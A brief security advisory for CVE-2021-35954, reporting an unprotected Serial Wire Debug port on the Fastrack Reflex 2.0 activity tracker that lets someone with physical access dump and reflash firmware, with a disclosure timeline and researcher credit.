Open Serial Debug Port Allows Firmware Dumping and Re-flashing in Fastrack Reflex 2.0 Activity Tracker
CVE-ID
CVE-2021-35954
Vendor
Fastrack
Product
Fastrack Reflex 2.0 Activity Tracker
Vulnerability
The open Serial Wire Debug (SWD) port allows unauthorized access for dumping firmware and reflashing custom firmware on the device.
Vulnerability Description
During hardware analysis of the PCB, it was identified that the SWD (Serial Wire Debug) interface was exposed and unprotected.
This allows attackers with physical access to connect a debugger and extract the device’s firmware without any authentication.
Moreover, the same interface can be used to flash modified or malicious firmware, potentially bricking the device or injecting backdoors.
Disclosure Timeline
17 Nov 2020 — Reported to vendor
30 Jun 2021 — No response; moving forward to public disclosure
30 Jun 2021 — No response; moving forward to public disclosure
Credit
Shakir Zari